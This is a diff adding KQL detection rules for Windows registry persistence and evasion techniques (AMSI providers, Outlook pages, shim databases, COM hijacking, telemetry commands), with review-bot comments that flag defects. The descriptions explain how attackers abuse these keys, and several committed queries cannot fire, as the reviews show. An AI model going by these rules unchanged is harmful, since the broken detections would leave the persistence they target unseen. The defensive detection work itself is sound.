+// Tags: attack.persistence
+// False Positives:
+// - Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\mpnotify"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_mycomputer_registry_keys.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_mycomputer_registry_keys.kql
new file mode 100644
index 00000000..015717af
--- /dev/null
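Review bot: `Extensions` is the `REG_MULTI_SZ` value the description names, so `RegistryKey contains "...\\LsaExtensionConfig\\LsaSrv\\Extensions"` tests the wrong column on a sensor that separates value names into `RegistryValueName`; the working form is `RegistryKey endswith "\\Control\\LsaExtensionConfig\\LsaSrv" and RegistryValueName =~ "Extensions"`. Given level high and no exclusions, adding `ActionType == "RegistryValueSet"` keeps key creation or deletion under `LsaSrv` from producing the same alert.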
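Review bot: The description ("register a new SIP provider") does not describe what the query matches, which is the `mpnotify` value under `Winlogon`, and the false-positive note repeats the mismatch; suggest `// Description: Detects modification of the Winlogon "mpnotify" value, which can be abused for persistence` and a matching rewording of the false-positive line. `mpnotify` is a value name, so on a sensor that fills `RegistryValueName` the last line needs `RegistryKey endswith "\\Windows NT\\CurrentVersion\\Winlogon" and RegistryValueName =~ "mpnotify"` instead of a `contains` on the key.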
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_mycomputer_registry_keys.kql
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via MyComputer Registry Keys
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-09
+// Level: high
+// Description: Detects modification to the "Default" value of the "MyComputer" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Unlikely but if you experience FPs add specific processes and locations you would like to monitor for
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer" and RegistryKey endswith "(Default)"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_netsh_helper_dll_registry.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_netsh_helper_dll_registry.kql
new file mode 100644
index 00000000..5dd8c87f
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_netsh_helper_dll_registry.kql
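Review bot: `RegistryKey endswith "(Default)"` assumes the default value's name is appended to the key path, which is how Sysmon's `TargetObject` looks but not how DeviceRegistryEvents is documented; there the key stays in `RegistryKey` and the value name in `RegistryValueName`, with the default value typically carrying an empty name. Suggest `RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer" and isempty(RegistryValueName)`, after checking a real row for how the default value is rendered. The description also points to a "reference section" that does not exist in this file; either carry the references over from the Sigma source or drop the parenthetical.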
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via Netsh Helper DLL - Registry
+// Author: Anish Bogati
+// Date: 2023-11-28
+// Level: medium
+// Description: Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.007
+// False Positives:
+// - Legitimate helper added by different programs and the OS
+
+DeviceRegistryEvents
+| where (RegistryValueData contains ".dll" and RegistryKey contains "\\SOFTWARE\\Microsoft\\NetSh") and (not(((RegistryValueData in~ ("ipmontr.dll", "iasmontr.dll", "ippromon.dll")) and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_new_amsi_providers_registry.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_new_amsi_providers_registry.kql
new file mode 100644
index 00000000..5a6f60be
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_new_amsi_providers_registry.kql
@@ -0,0 +1,14 @@
+// Title: Potential Persistence Via New AMSI Providers - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: medium
+// Description: Detects when an attacker adds a new AMSI provider via the Windows Registry to bypass AMSI (Antimalware Scan Interface) protections.
+// Attackers may add custom AMSI providers to persist on the system and evade detection by security software that relies on AMSI for scanning scripts and other content.
+// This technique is often used in conjunction with fileless malware and script-based attacks to maintain persistence while avoiding detection.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Legitimate security products adding their own AMSI providers. Filter these according to your environment.
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\SOFTWARE\\Microsoft\\AMSI\\Providers*" or RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\AMSI\\Providers*") and (not((((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Avast Software\\Avast\\RegSvr.exe", "C:\\Program Files\\Avast Software\\Avast\\x86\\RegSvr.exe")) and RegistryKey contains "\\{FB904E4E-D2C7-4C8D-8492-B620BB9896B1}") or ((InitiatingProcessFolderPath in~ ("C:\\Program Files\\AVG\\Antivirus\\RegSvr.exe", "C:\\Program Files\\AVG\\Antivirus\\x86\\RegSvr.exe")) and RegistryKey contains "\\{FB904E4E-D2C7-4C8D-8492-B620BB9896B1}") or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Avira\\Endpoint Protection SDK\\endpointprotection.exe" and RegistryKey contains "\\{00000001-3DCC-4B48-A82E-E2071FE58E05}"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_outlook_home_page.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_outlook_home_page.kql
new file mode 100644
index 00000000..c3b4845d
--- /dev/null
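Review bot: Both key tests on the last line end in a literal `*` (`...\\AMSI\\Providers*`), and `endswith` in KQL does not treat it as a wildcard, so the rule never fires and the three vendor exclusions are never exercised. Use `RegistryKey contains "\\SOFTWARE\\Microsoft\\AMSI\\Providers\\" or RegistryKey contains "\\SOFTWARE\\WOW6432Node\\Microsoft\\AMSI\\Providers\\"`; the `RegistryKey contains "\\{GUID}"` clauses inside the exclusions already work with that form. A new provider is registered as a subkey as much as by a value write, so leaving `ActionType` unfiltered is appropriate here.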
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_outlook_home_page.kql
@@ -0,0 +1,11 @@
+// Title: Potential Persistence Via Outlook Home Page
+// Author: Tobias Michalski (Nextron Systems), David Bertho (@dbertho) & Eirik Sveen (@0xSV1), Storebrand
+// Date: 2021-06-09
+// Level: high
+// Description: Detects potential persistence activity via outlook home page.
+// An attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1112
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\Software\\Microsoft\\Office*" and RegistryKey endswith "\\Outlook\\WebView*") and RegistryKey endswith "\\URL"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_outlook_loadmacroprovideronboot_setting.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_outlook_loadmacroprovideronboot_setting.kql
new file mode 100644
index 00000000..f38cc1af
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_outlook_loadmacroprovideronboot_setting.kql
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-04-05
+// Level: high
+// Description: Detects the modification of Outlook setting "LoadMacroProviderOnBoot" which if enabled allows the automatic loading of any configured VBA project/module
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.command-and-control, attack.t1137, attack.t1008, attack.t1546
+
+DeviceRegistryEvents
+| where RegistryValueData contains "0x00000001" and RegistryKey endswith "\\Outlook\\LoadMacroProviderOnBoot"
\ No newline at end of file
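Review bot: Three `endswith` tests are ANDed on the last line (`...\\Office*`, `...\\WebView*`, `\\URL`); only one suffix can hold at a time and the asterisks are literal, so this high-level rule is dead. The first two are prefix/fragment tests and the third is a value name, so the equivalent is `RegistryKey contains "\\Software\\Microsoft\\Office\\" and RegistryKey contains "\\Outlook\\WebView\\" and RegistryValueName =~ "URL"`, assuming the sensor reports value names in `RegistryValueName` (confirm on a row).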
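Review bot: `RegistryValueData contains "0x00000001"` matches Sysmon's `DWORD (0x00000001)` rendering; if the sensor reports DWORD data as a plain decimal string, as DeviceRegistryEvents commonly does (confirm on a sample `RegistryValueSet` row), this high-level rule never matches a value of 1. `RegistryValueData in~ ("1", "0x00000001")` covers both renderings. `LoadMacroProviderOnBoot` is also a value name, so `RegistryValueName =~ "LoadMacroProviderOnBoot"` is a more reliable anchor than `RegistryKey endswith "\\Outlook\\LoadMacroProviderOnBoot"`.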
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_outlook_today_page.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_outlook_today_page.kql
new file mode 100644
index 00000000..fe33ee24
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_outlook_today_page.kql
@@ -0,0 +1,11 @@
+// Title: Potential Persistence Via Outlook Today Page
+// Author: Tobias Michalski (Nextron Systems), David Bertho (@dbertho) & Eirik Sveen (@0xSV1), Storebrand
+// Date: 2021-06-10
+// Level: high
+// Description: Detects potential persistence activity via outlook today page.
+// An attacker can set a custom page to execute arbitrary code and link to it via the registry values "URL" and "UserDefinedUrl".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1112
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "Software\\Microsoft\\Office*" and RegistryKey endswith "\\Outlook\\Today*") and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Stamp") or (RegistryKey endswith "\\URL" or RegistryKey endswith "\\UserDefinedUrl")) and (not((InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_scrobj_dll_com_hijacking.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_scrobj_dll_com_hijacking.kql
new file mode 100644
index 00000000..2eba3e8e
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_scrobj_dll_com_hijacking.kql
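Review bot: `RegistryValueData =~ "DWORD (0x00000001)"` is Sysmon's text rendering of a DWORD; if the sensor reports `1` instead (check a real `RegistryValueSet` row), the `Stamp` branch never matches. The key tests share the defect seen elsewhere in this change: `RegistryKey endswith "Software\\Microsoft\\Office*" and RegistryKey endswith "\\Outlook\\Today*"` is unsatisfiable because the `*` is literal and two suffixes cannot both hold, so nothing in this rule fires until they become `RegistryKey contains "\\Software\\Microsoft\\Office\\" and RegistryKey contains "\\Outlook\\Today\\"`. `Stamp`, `URL` and `UserDefinedUrl` are value names, which the description itself says, and belong in `RegistryValueName`.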
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via Scrobj.dll COM Hijacking
+// Author: frack113
+// Date: 2022-08-20
+// Level: medium
+// Description: Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015
+// False Positives:
+// - Legitimate use of the dll.
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "C:\\WINDOWS\\system32\\scrobj.dll" and RegistryKey endswith "InprocServer32\\(Default)"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_shim_database_in_uncommon_location.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_shim_database_in_uncommon_location.kql
new file mode 100644
index 00000000..974e2b41
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_shim_database_in_uncommon_location.kql
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Via Shim Database In Uncommon Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-01
+// Level: high
+// Description: Detects the installation of a new shim database where the file is located in a non-default location
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.011
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB*" and RegistryKey contains "\\DatabasePath") and (not(RegistryValueData contains ":\\Windows\\AppPatch\\Custom"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_shim_database_modification.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_shim_database_modification.kql
new file mode 100644
index 00000000..b7942226
--- /dev/null
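Review bot: `RegistryValueData =~ "C:\\WINDOWS\\system32\\scrobj.dll"` only matches that exact spelling, so a value written as `%SystemRoot%\\system32\\scrobj.dll`, the `SysWOW64` copy, or a system drive other than `C:` is not caught even though it points at the same DLL; `RegistryValueData endswith "\\scrobj.dll"` is the safer test and remains case-insensitive. `InprocServer32\\(Default)` treats the default value as a key suffix; on a sensor with a separate `RegistryValueName` column this should be `RegistryKey endswith "\\InprocServer32" and isempty(RegistryValueName)`, after confirming how the default value is named in real rows.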
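Review bot: `RegistryKey endswith "...\\AppCompatFlags\\InstalledSDB*"` with a literal `*` is never true, so this high-level rule is inert. `DatabasePath` is a value of each SDB's subkey, so the working shape is `RegistryKey contains "\\AppCompatFlags\\InstalledSDB\\" and RegistryValueName =~ "DatabasePath"`, with the `not(RegistryValueData contains ":\\Windows\\AppPatch\\Custom")` exclusion kept as is since the data column does hold the path.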
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_shim_database_modification.kql
@@ -0,0 +1,13 @@
+// Title: Potential Persistence Via Shim Database Modification
+// Author: frack113
+// Date: 2021-12-30
+// Level: medium
+// Description: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.
+// The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.011
+// False Positives:
+// - Legitimate custom SHIM installations will also trigger this rule
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB*" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom*") and (not((RegistryValueData =~ "" or RegistryValueData =~ "(Empty)" or isnull(RegistryValueData))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_typedpaths.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_typedpaths.kql
new file mode 100644
index 00000000..519f52b7
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_typedpaths.kql
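Review bot: Both `endswith` tests (`...\\InstalledSDB*`, `...\\Custom*`) end in a literal asterisk and therefore never match; the intended prefix tests are `RegistryKey contains "\\AppCompatFlags\\InstalledSDB\\" or RegistryKey contains "\\AppCompatFlags\\Custom\\"`. The exclusion `RegistryValueData =~ "" or RegistryValueData =~ "(Empty)" or isnull(RegistryValueData)` collapses to `isempty(RegistryValueData) or RegistryValueData =~ "(Empty)"`, which also makes its purpose of dropping data-less key-creation events clearer.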
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via TypedPaths
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-22
+// Level: high
+// Description: Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths*" and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\SysWOW64\\explorer.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_visual_studio_tools_for_office.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_visual_studio_tools_for_office.kql
new file mode 100644
index 00000000..a9a51619
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_visual_studio_tools_for_office.kql
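Review bot: `RegistryKey endswith "...\\Explorer\\TypedPaths*"` never matches because the `*` is a literal character under `endswith`, so the explorer.exe exclusion is never reached. The typed entries are values of the `TypedPaths` key itself (typically `url1`, `url2`, ...), so `RegistryKey endswith "\\Explorer\\TypedPaths"` is the right key test and `RegistryValueData` then carries the path an analyst would want to see. The two excluded explorer.exe paths are absolute, so on a system whose system drive is not `C:` the exclusion silently stops applying; `InitiatingProcessFolderPath endswith "\\Windows\\explorer.exe" or InitiatingProcessFolderPath endswith "\\Windows\\SysWOW64\\explorer.exe"` is more robust.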
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via Visual Studio Tools for Office
+// Author: Bhabesh Raj
+// Date: 2021-01-10
+// Level: medium
+// Description: Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.
+// MITRE Tactic: Persistence
+// Tags: attack.t1137.006, attack.persistence
+// False Positives:
+// - Legitimate Addin Installation
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\Software\\Microsoft\\Office\\Outlook\\Addins*" or RegistryKey endswith "\\Software\\Microsoft\\Office\\Word\\Addins*" or RegistryKey endswith "\\Software\\Microsoft\\Office\\Excel\\Addins*" or RegistryKey endswith "\\Software\\Microsoft\\Office\\Powerpoint\\Addins*" or RegistryKey endswith "\\Software\\Microsoft\\VSTO\\Security\\Inclusion*") and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe")) or ((InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\Integrator.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\Teams.exe" or InitiatingProcessFolderPath endswith "\\visio.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Office\\OFFICE" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\OFFICE" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Office\\Root\\OFFICE" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\Root\\OFFICE")) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files (x86)\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith 
"C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\")) or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe", "C:\\Windows\\System32\\regsvr32.exe", "C:\\Windows\\SysWOW64\\regsvr32.exe"))))) and (not((((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Avast Software\\Avast\\RegSvr.exe", "C:\\Program Files (x86)\\Avast Software\\Avast\\RegSvr.exe")) and RegistryKey endswith "\\Microsoft\\Office\\Outlook\\Addins\\Avast.AsOutExt*") or ((InitiatingProcessFolderPath in~ ("C:\\Program Files\\AVG\\Antivirus\\RegSvr.exe", "C:\\Program Files (x86)\\AVG\\Antivirus\\RegSvr.exe")) and RegistryKey endswith "\\Microsoft\\Office\\Outlook\\Addins\\Antivirus.AsOutExt*")))) \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/potential_powershell_execution_policy_tampering.kql b/KQL/rules/windows/registry/registry_set/potential_powershell_execution_policy_tampering.kql new file mode 100644 index 00000000..8d5f1bf8 --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/potential_powershell_execution_policy_tampering.kql @@ -0,0 +1,10 @@ +// Title: Potential PowerShell Execution Policy Tampering +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-11 +// Level: medium +// Description: Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceRegistryEvents +| where ((RegistryValueData contains "Bypass" or RegistryValueData contains "Unrestricted") and (RegistryKey endswith "\\ShellIds\\Microsoft.PowerShell\\ExecutionPolicy" or RegistryKey endswith "\\Policies\\Microsoft\\Windows\\PowerShell\\ExecutionPolicy")) and (not((InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\"))) \ No newline at end of file 
diff --git a/KQL/rules/windows/registry/registry_set/potential_provisioning_registry_key_abuse_for_binary_proxy_execution_reg.kql b/KQL/rules/windows/registry/registry_set/potential_provisioning_registry_key_abuse_for_binary_proxy_execution_reg.kql
new file mode 100644
index 00000000..3a401884
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_provisioning_registry_key_abuse_for_binary_proxy_execution_reg.kql
@@ -0,0 +1,10 @@
+// Title: Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2023-08-02
+// Level: high
+// Description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Provisioning\\Commands*"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_psfactorybuffer_com_hijacking.kql b/KQL/rules/windows/registry/registry_set/potential_psfactorybuffer_com_hijacking.kql
new file mode 100644
index 00000000..ca605a3c
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_psfactorybuffer_com_hijacking.kql
@@ -0,0 +1,10 @@
+// Title: Potential PSFactoryBuffer COM Hijacking
+// Author: BlackBerry Threat Research and Intelligence Team - @Joseliyo_Jstnk
+// Date: 2023-06-07
+// Level: high
+// Description: Detects changes to the PSFactory COM InProcServer32 registry. This technique was used by RomCom to create persistence storing a malicious DLL.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\CLSID\\{c90250f3-4d7d-4991-9b69-a5c5bc1c2ae6}\\InProcServer32\\(Default)" and (not((RegistryValueData in~ ("%windir%\\System32\\ActXPrxy.dll", "C:\\Windows\\System32\\ActXPrxy.dll"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_ransomware_activity_using_legalnotice_message.kql b/KQL/rules/windows/registry/registry_set/potential_ransomware_activity_using_legalnotice_message.kql
new file mode 100644
index 00000000..21eea4ca
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_ransomware_activity_using_legalnotice_message.kql
@@ -0,0 +1,10 @@
+// Title: Potential Ransomware Activity Using LegalNotice Message
+// Author: frack113
+// Date: 2022-12-11
+// Level: high
+// Description: Detect changes to the "LegalNoticeCaption" or "LegalNoticeText" registry values where the message set contains keywords often used in ransomware ransom messages
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1491.001
+
+DeviceRegistryEvents
+| where (RegistryValueData contains "encrypted" or RegistryValueData contains "Unlock-Password" or RegistryValueData contains "paying") and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LegalNoticeCaption" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LegalNoticeText")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_registry_persistence_attempt_via_dbgmanageddebugger.kql b/KQL/rules/windows/registry/registry_set/potential_registry_persistence_attempt_via_dbgmanageddebugger.kql
new file mode 100644
index 00000000..51e89c61
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_registry_persistence_attempt_via_dbgmanageddebugger.kql
@@ -0,0 +1,12 @@
+// Title: Potential Registry Persistence Attempt Via DbgManagedDebugger
+// Author: frack113
+// Date: 2022-08-07
+// Level: medium
+// Description: Detects the addition of the "Debugger" value to the "DbgManagedDebugger" key in order to achieve persistence. Which will get invoked when an application crashes
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574
+// False Positives:
+// - Legitimate use of the key to setup a debugger. Which is often the case on developers machines
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Microsoft\\.NETFramework\\DbgManagedDebugger" and (not(RegistryValueData =~ "\"C:\\Windows\\system32\\vsjitdebugger.exe\" PID %d APPDOM %d EXTEXT \"%s\" EVTHDL %d"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_registry_persistence_attempt_via_windows_telemetry.kql b/KQL/rules/windows/registry/registry_set/potential_registry_persistence_attempt_via_windows_telemetry.kql
new file mode 100644
index 00000000..6c5eee3c
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_registry_persistence_attempt_via_windows_telemetry.kql
@@ -0,0 +1,13 @@
+// Title: Potential Registry Persistence Attempt Via Windows Telemetry
+// Author: Lednyov Alexey, oscd.community, Sreeman
+// Date: 2020-10-16
+// Level: high
+// Description: Detects potential persistence behavior using the windows telemetry registry key.
+// Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.
+// This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.
+// The problem is, it will run any arbitrary command without restriction of location or type.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005
+
+DeviceRegistryEvents
+| where ((RegistryValueData contains ".bat" or RegistryValueData contains ".bin" or RegistryValueData contains ".cmd" or RegistryValueData contains ".dat" or RegistryValueData contains ".dll" or RegistryValueData contains ".exe" or RegistryValueData contains ".hta" or RegistryValueData contains ".jar" or RegistryValueData contains ".js" or RegistryValueData contains ".msi" or RegistryValueData contains ".ps" or RegistryValueData contains ".sh" or RegistryValueData contains ".vb") and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController*" and RegistryKey endswith "\\Command") and (not((RegistryValueData contains "\\system32\\CompatTelRunner.exe" or RegistryValueData contains "\\system32\\DeviceCensus.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_sentinelone_shell_context_menu_scan_command_tampering.kql b/KQL/rules/windows/registry/registry_set/potential_sentinelone_shell_context_menu_scan_command_tampering.kql
new file mode 100644
index 00000000..9a5cd754
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_sentinelone_shell_context_menu_scan_command_tampering.kql
@@ -0,0 +1,10 @@
+// Title: Potential SentinelOne Shell Context Menu Scan Command Tampering
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-03-06
+// Level: medium
+// Description: Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\shell\\SentinelOneScan\\command*" and (not(((InitiatingProcessFolderPath endswith "C:\\Program Files\\SentinelOne\\" or InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\SentinelOne\\") or (RegistryValueData contains "\\SentinelScanFromContextMenu.exe" and (RegistryValueData startswith "C:\\Program Files\\SentinelOne\\Sentinel Agent" or RegistryValueData startswith "C:\\Program Files (x86)\\SentinelOne\\Sentinel Agent")))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_signing_bypass_via_windows_developer_features_registry.kql b/KQL/rules/windows/registry/registry_set/potential_signing_bypass_via_windows_developer_features_registry.kql
new file mode 100644
index 00000000..82091f61
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_signing_bypass_via_windows_developer_features_registry.kql
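Review bot: The exclusion `InitiatingProcessFolderPath endswith "C:\\Program Files\\SentinelOne\\"` (and its x86 twin) can never match, because a process image path does not end in a directory separator; the Sigma source presumably expressed a directory prefix here, so the agent's own updates of the scan command are not filtered and will alert. Changing the two operators to `startswith` restores the intended allow-list while leaving the `RegistryValueData` branch as is. This seems to be an operator-mapping slip rather than a rule-author choice, so it is worth checking whether other converted rules carry a trailing-backslash `endswith`.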
@@ -0,0 +1,10 @@
+// Title: Potential Signing Bypass Via Windows Developer Features - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-12
+// Level: high
+// Description: Detects when the enablement of developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\AppModelUnlock" or RegistryKey endswith "\\Policies\\Microsoft\\Windows\\Appx*") and (RegistryKey endswith "\\AllowAllTrustedApps" or RegistryKey endswith "\\AllowDevelopmentWithoutDevLicense")
\ No newline at end of file
